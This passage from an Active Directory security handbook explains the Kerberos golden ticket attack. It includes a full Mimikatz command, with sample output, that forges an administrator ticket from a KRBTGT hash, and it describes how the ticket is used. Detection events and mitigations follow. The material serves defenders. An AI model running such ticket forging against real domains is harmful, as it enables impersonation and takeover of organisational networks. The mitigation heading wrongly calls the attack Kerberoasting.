{{< admonition info >}}
Note that security updates in November 2021 for Kerberos have patched this method of attack. As a result, if the domain controllers have installed the update, a real user account must be used.
{{< /admonition >}}

To forge a TGT, the attacker needs to supply certain information to the Mimikatz kerberos::golden function: The domain's fully qualified domain name, the security identifier of the domain (SID), the password hash of the KRBTGT user (using AES-256, and alternatively AES-128, NTLM, or RC4), the username to impersonate, the RID of groups to include in the ticket with the first being the primary group of the user, and the ptt flag to indicate whether the forged ticket should be injected into the current session instead of saving it to a file:
```
PS> mimikatz.exe "kerberos::golden /domain:domain.com

/sid:S-1-5-21-5840559-2756745051-1363507867
/aes256:ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5
/id:500 /user:NonExistentAdministator /groups:GroupNumber1, GroupNumber2 /ptt"

User      : NonExistentAdministator
Domain    : domain.com (DOMAIN)
SID       : S-1-5-21-5840559-2756745051-1363507867
User Id   : 500
Groups Id : *513 2668
ServiceKey: ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5 -
aes256_hmac
-> Ticket : ** Pass The Ticket **
. . .
Golden ticket for 'NonExistentUser@domain.com' successfully submitted for
current session
```
Note that with the /id flag the adversary indicated the user id that they want to create the ticket for. In this case the attacker passes the 500 value to the /id flag to create an Administrator account. The name of the user account can be anything, as given in the example.

##### Step 3: Using the forged kerberos ticket
The attacker can utilize the forged ticket to gain access to resources integrated with Kerberos. The TGT is signed and encrypted with the actual KRBTGT password hash, which makes it a valid proof of identity in the eyes of any domain controller. The domain controller will then issue ticket-granting service (TGS) tickets based on the TGT.

As the attacker gains more information about the environment, they can use the forged tickets to access applications, databases, or other resources that use Active Directory for authentication and authorization. The attacker may target specific groups by including their RID in the ticket-forging process. For instance, they might discover the group "MSSQL Administrators" with the corresponding RID during a discovery phase, which might give them access to valuable databases [^30].

#### Detection Methods for the Golden Ticket Attack
**Event ID 4769** - A Kerberos Service Ticket was requested.
* Key Description Fields: Account Name, Service Name, Client Address

**Event ID 4624** - An account was successfully logged on.
* Key Description Fields: Account Name, Account Domain, Logon ID

**Event ID 4627** - Identifies the account that requested the logon.
* Key Description Fields: Security ID, Account Name, Account Domain, Logon ID

#### Mitigation Techniques for the Golden Ticket Attack
To guard against Kerberoasting attacks, it is recommended to take steps to limit the access of adversaries and make it harder for them to obtain the password hash of the KRBTGT user. This can be achieved through the following actions [^30], [^31]: 

##### Mitigation Technique 1: Restricting administrative privileges across security boundaries

Organizations should not allow users to possess administrative privileges across security boundaries. For instance, an attacker who gains access to a workstation should not be able to escalate their privileges to target the domain controller. 
##### Mitigation Technique 2: Minimizing elevated privileges
Service accounts with high privileges, such as Domain Admins, should be granted only when necessary. By limiting the number of these accounts, organizations can reduce the number of targets for an attacker seeking the KRBTGT hash.
##### Mitigation Technique 3: Regularly changing the password for the KRBTGT account
It is important to change the password for the KRBTGT user on a regular schedule and immediately after any changes in personnel responsible for Active Directory administration. The password should be changed twice, with a 12-24 hour interval between the two changes, to avoid any service disruptions.

## Next Part
[The Complete Active Directory Security Handbook (Part-2)]({{< ref "complete-active-directory-security-handbook-2.md" >}})

## References

[^1]: [“MS-ADTS: Introduction”](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/bacff5f1-9127-457b-877c-db97b1e1802f)
[^2]: [“Active Directory: What is it? Why is it important?”](https://www.intermedia.com/blog/what-is-active-directory-and-why-is-it-so-important/)
[^3]: [“Benefits of Active Directory (Pros and Cons)”](https://cloudinfrastructureservices.co.uk/benefits-of-active-directory/)
[^4]: [“Benefits of Microsoft 365 and Azure Active Directory for Identity Management”](https://montra.io/benefits-of-microsoft-365-and-azure-active-directory-for-identity-management/)
[^5]: [“DBIR Report 2022 - Masters Guide”](https://www.verizon.com/business/resources/reports/dbir/2022/master-guide/)
[^6]: [“Cost of a Data Breach Report 2022”](https://www.ibm.com/downloads/cas/3R8N1DZJ)
[^7]: [“Compare Active Directory to Azure Active Directory”](https://learn.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-compare-azure-ad-to-ad)
[^8]: [“How Attackers Move from Azure Active Directory to On-Prem AD”](https://thenewstack.io/how-attackers-move-from-azure-active-directory-to-on-prem-ad/)
[^9]: [“GitHub - ParrotSec/mimikatz”](https://github.com/ParrotSec/mimikatz)
[^10]: [“GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentesting”](https://github.com/Hackplayers/evil-winrm)
[^11]: [“ProcDump - Sysinternals”](https://learn.microsoft.com/en-us/sysinternals/downloads/procdump)
[^12]: [“gsecdump”](https://jpcertcc.github.io/ToolAnalysisResultSheet/details/gsecdump.htm)
[^13]: [“5985,5986 - Pentesting WinRM”](https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm)
[^14]: [“mimikatz > sekurlsa::logonpasswords”](https://jpcertcc.github.io/ToolAnalysisResultSheet/details/Mimikatz_sekurlsa-logonpasswords.htm)
[^15]: [“Detecting Lateral Movement through Tracking Event Logs”](https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf)
[^16]: [“How to Detect Pass-the-Hash Attacks”](https://blog.netwrix.com/2021/11/30/how-to-detect-pass-the-hash-attacks/)
[^17]: [“Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft Techniques”](https://scadahacker.com/library/Documents/White_Papers/Microsoft%20-%20Mitigating%20Pass-the-Hash%20(PtH)%20Attacks%20and%20Other%20Credential%20Theft%20Techniques_English.pdf)
[^18]: [“GitHub - gentilkiwi/kekeo: A little toolbox to play with Microsoft Kerberos in C”](https://github.com/gentilkiwi/kekeo)
[^19]: [“GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog”](https://github.com/GhostPack/Rubeus)
[^20]: [“creddump7”](https://www.kali.org/tools/creddump7/)
[^21]: [“A Detailed Guide on Rubeus”](https://www.hackingarticles.in/a-detailed-guide-on-rubeus/)
[^22]: [“Kerberos Authentication Overview”](https://learn.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview)
[^23]: [“Kerberoast”](https://www.thehacker.recipes/ad/movement/kerberos/kerberoast)
[^24]: [“Kerberoasting Attack”](https://www.netwrix.com/cracking_kerberos_tgs_tickets_using_kerberoasting.html)
[^25]: [“Attack Tutorial: How the Kerberoasting Attack Works”](https://www.youtube.com/watch?v=u6GwzBps6Lo)
[^26]: [“Sneaky Persistence Active Directory Trick #18: Dropping SPNs on Admin Accounts for Later Kerberoasting”](https://adsecurity.org/?p=3466)
[^27]: [“Detecting Kerberoasting Activity”](https://adsecurity.org/?p=3458)
[^28]: [“Website”](https://www.netwrix.com/cracking_kerberos_tgs_tickets_using_kerberoasting.html)
[^29]: [“Impacket Deep Dives Vol. 2: Attacking Kerberos - Kyle Mistele,”](https://kylemistele.medium.com/impacket-deep-dives-vol-2-attacking-kerberos-922e8cdd472a)
[^30]: [“Golden Ticket Attack”](https://www.netwrix.com/how_golden_ticket_attack_works.html)
[^31]: [“Golden ticket attacks: How they work — and how to defend against them”](https://blog.quest.com/golden-ticket-attacks-how-they-work-and-how-to-defend-against-them/)